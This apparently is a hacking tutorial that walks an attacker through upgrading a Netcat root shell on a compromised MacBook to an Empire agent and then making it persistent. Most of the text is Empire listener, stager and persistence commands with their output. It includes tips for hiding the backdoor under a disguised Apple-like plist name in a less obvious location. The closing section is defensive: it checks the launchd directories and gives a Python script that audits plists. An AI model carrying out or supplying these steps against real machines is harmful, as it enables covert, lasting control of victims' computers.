After gaining backdoor access to a MacBook that is not protected by FileVault, or using a fake PDF document to gain remote access, an attacker might want to upgrade their Netcat shell to a more complete framework. While a root shell already lets an attacker remotely modify most files on the MacBook, Empire has some useful post-exploitation modules that make hacking Macs very easy.
At this point, the attacker has already obtained remote access to the target MacBook or another Mac model. In my example, I'm building on an already established Netcat backdoor:
tokyoneon ~ $ nc -l -p 1234
listening on [any] 1234 ...
connect to [xx.xx.x.xx] from (xxxxx) [xx.xx.x.xx] 50027
bash: no job control in this shell
bash-3.2# _
To begin, Empire should be installed and configured on the attacker's system. If the target MacBook is on the local network, installing Empire in Kali will do the trick. If the target is mobile and constantly moving between Wi-Fi networks, Empire must be installed on the attacker's virtual private server (VPS).
Step 1: Start the Empire Listener
Empire should be running with a listener waiting for incoming connections from the target MacBook. In this example, I'm using an HTTP listener on port 8080. The following commands set up an Empire listener:
uselistener http
set Port 8080
set Host xx.xx.x.xx
execute
This is what it should look like after you have executed the commands:
(Empire)> listeners
[!] No listeners currently active
(Empire: listeners)> uselistener http
(Empire: listeners/http)> set Port 8080
(Empire: listeners/http)> set Host xx.xx.x.xx
(Empire: listeners/http)> execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http)> listeners
[*] Active listeners:
  Name  Module  Host                    Delay/Jitter
  ----  ------  ----                    ------------
  http  http    http://xx.xx.x.xx:8080  5/0.0
(Empire: listeners)> _
Step 2: Generate the Stager
Next, create a launcher script with the osx/launcher stager. This can be done with the following commands:
usestager osx/launcher
set Listener http
generate
The entire Empire output (in the example above, the long line starting with "echo" at the bottom) should be copied and pasted into the Netcat terminal.
A new agent will appear in the Empire terminal once the stager runs on the MacBook:
(Empire: agents)>
[*] Sending PYTHON stager (stage 1) to xx.xx.x.xx
[*] Agent P98MAEE0 from xx.xx.x.xx posted valid Python PUB key
[*] New agent P98MAEE0 checked in
[+] Initial agent P98MAEE0 from xx.xx.x.xx now active (Slack)
[*] Sending agent (stage 2) to P98MAEE0 at xx.xx.x.xx
[>] ...................
(Empire: agents)> _
The attacker now has a large number of post-exploitation modules available. Stay tuned for future articles where I'll show you how to use Empire's more advanced post-exploitation modules to further compromise the MacBook and its Wi-Fi networks.
Upgrading a shell to a more advanced framework such as Empire or Metasploit is easy enough for a hacker, but maintaining such a backdoor over a long period is a little trickier. The Python script currently running as a background process shuts down when the user logs off or the computer is turned off.
The following persistence module creates a new Empire agent every time the MacBook restarts.
Step 3: Set Persistence with Empire
In the Empire terminal, use the agents command to display the newly created agent. Then use the interact command to start interacting with the compromised MacBook's agent:
(Empire)> agents
[*] Active agents:
  Name      Lang  Internal IP  Machine Name     Username  Process
  ----      ----  -----------  ------------     --------  -------
  P98MAEE0  py    xx.xx.x.xx   xxxxx MacBook A  *root     /usr/bin/py
(Empire: agents)> interact P98MAEE0
(Empire: P98MAEE0)> _
Select the module with usemodule, then use the info command to display the available module options:
(Empire)> interact P98MAEE0
(Empire: P98MAEE0)> usemodule persistence/osx/launchdaemonexecutable
(Empire: python/persistence/osx/launchdaemonexecutable)> info

Options:
  Name            Required  Value                 Description
  ----            --------  -----                 -----------
  SafeChecks      True      True                  Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.
  DaemonLocation  True                            The full path of where the Empire launch daemon should live.
  DaemonName      True      com.proxy.initialize  Name of the launch daemon to install. Name will also be used for the plist file.
  Agent           True      P98MAEE0              Agent to run module on.
  Listener        True                            Listener to use.
  UserAgent       False     default               User-agent string to use for the staging request (default, none, or other).
(Empire: python/persistence/osx/launchdaemonexecutable)>
This particular Empire module requires several options to be set before it is run on the target MacBook. The required options can be set with the following commands:
set DaemonLocation /etc/empire_persistence
set DaemonName com.empire
set Agent P98MAEE0
set Listener http
In my example, this looks like the following:
(Empire: python/persistence/osx/launchdaemonexecutable)> set DaemonLocation /etc/empire_persistence
(Empire: python/persistence/osx/launchdaemonexecutable)> set DaemonName com.empire
(Empire: python/persistence/osx/launchdaemonexecutable)> set Agent P98MAEE0
(Empire: python/persistence/osx/launchdaemonexecutable)> set Listener http
(Empire: python/persistence/osx/launchdaemonexecutable)> _
- DaemonLocation is the full path of the Empire executable that runs when the MacBook restarts. For demonstration purposes I'm using the /etc/ directory and the file name empire_persistence. To avoid detection, the daemon can be created in a less obvious location.
- DaemonName (com.empire) is the name of the .plist configuration file and can be renamed to anything. For a more convincing file name, attackers can use com.applesecurity.plist. This .plist file is automatically stored in the /Library/LaunchDaemons/ directory on the target MacBook and should not be moved or modified; launch daemons must live in this directory.
- The Agent and Listener should also be set accordingly if they are not set automatically.
Use the execute command to install the Empire backdoor on the MacBook.
execute
Below is what my example looks like. You may need to press Y when warned that the module is not opsec-safe.
(Empire: python/persistence/osx/launchdaemonexecutable)> execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked P98MAEE0 to run TASK_CMD_WAIT
[*] Agent P98MAEE0 tasked with task ID 1
[*] Tasked agent P98MAEE0 to run module python/persistence/osx/launchdaemonexecutable
(Empire: python/persistence/osx/launchdaemonexecutable)>
[*] Agent P98MAEE0 returned results.
[+] Persistence has been installed: /Library/LaunchDaemons/com.empire.plist
[+] Empire daemon has been written to /etc/empire_persistence
[*] Valid results returned by xx.xx.x.xx
(Empire: python/persistence/osx/launchdaemonexecutable)> _
How to Protect Against Persistent Backdoors
While some antivirus software may protect against such attacks, there is no way to be sure without testing on a Mac, which I'll do later for an antivirus-bypass article. I'll update my results here if they actually protect against persistent backdoors. Otherwise:
- Search for suspicious files. Launch daemon and agent directories used by macOS include /Library/LaunchDaemons, /Library/LaunchAgents, and /Users/<username>/Library/LaunchAgents. Files in these directories can be checked by opening Terminal and using cd to change to the desired directory and ls to list its contents. Suspicious daemons can be unloaded with launchctl and removed with rm:
tokyoneon:~ root# cd /Library/LaunchDaemons/
tokyoneon:/Library/LaunchDaemons root# ls
com.apple.plist  com.h4ck3r.plist  com.empire.plist  com.netcat.plist
tokyoneon:/Library/LaunchDaemons root# sudo launchctl unload com.h4ck3r.plist
tokyoneon:/Library/LaunchDaemons root# rm com.h4ck3r.plist
tokyoneon:/Library/LaunchDaemons root# _
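Listing the directory only shows file names; a quick way to see what each job actually runs is to parse the plists. The following script is an added example (not from the original article) that uses the standard library's plistlib to audit every .plist in the launchd directories named above and flag jobs whose executable lives somewhere unusual (such as the /etc path used by the Empire module), whose label imitates Apple, or that both run at load and are kept alive. The directory list and the list of expected executable prefixes are my assumptions, and the embedded sample plist is constructed to mirror the module output shown above.

```python
import plistlib
from pathlib import Path
# launchd job directories named in the article; the last one is per user.
LAUNCH_DIRS = ["/Library/LaunchDaemons", "/Library/LaunchAgents",
               str(Path.home() / "Library" / "LaunchAgents")]
# Assumed prefixes where a job's executable normally lives; /etc, /tmp or a
# user-writable directory (as used by the Empire module above) is worth a look.
EXPECTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/",
                     "/Library/Apple/", "/Library/Application Support/")

def audit_plist(raw):
    """Return the reasons a launchd plist looks suspicious (empty list = nothing found)."""
    try:
        job = plistlib.loads(raw)
    except Exception as exc:  # a plist launchd cannot parse deserves a look itself
        return ["unparsable plist: %s" % exc]
    reasons = []
    label = str(job.get("Label", ""))
    # Apple's own jobs ship under /System/Library, so com.apple.* here is a disguise.
    if label.startswith("com.apple."):
        reasons.append("label %r imitates Apple" % label)
    args = list(job.get("ProgramArguments") or [])
    if "Program" in job:  # some jobs name the binary here instead
        args.insert(0, job["Program"])
    for arg in args:  # check every absolute path so interpreter + script pairs are caught
        if isinstance(arg, str) and arg.startswith("/") and not arg.startswith(EXPECTED_PREFIXES):
            reasons.append("executes from unexpected location %r" % arg)
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("starts at boot/login and is restarted if killed")
    return reasons

def audit_directories(dirs=LAUNCH_DIRS):
    """Audit every .plist in the launchd directories; only flagged files are returned."""
    findings = {}
    for d in dirs:
        for plist in Path(d).glob("*.plist"):
            if reasons := audit_plist(plist.read_bytes()):
                findings[str(plist)] = reasons
    return findings

# Constructed sample mirroring the module output above (com.empire, /etc/empire_persistence).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>
  <key>Label</key><string>com.empire</string>
  <key>ProgramArguments</key><array><string>/etc/empire_persistence</string></array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print(audit_plist(SAMPLE_PLIST), audit_directories(), sep="\n")
```

A flagged file is a lead, not a verdict: confirm what the referenced binary is before unloading it with launchctl as shown above.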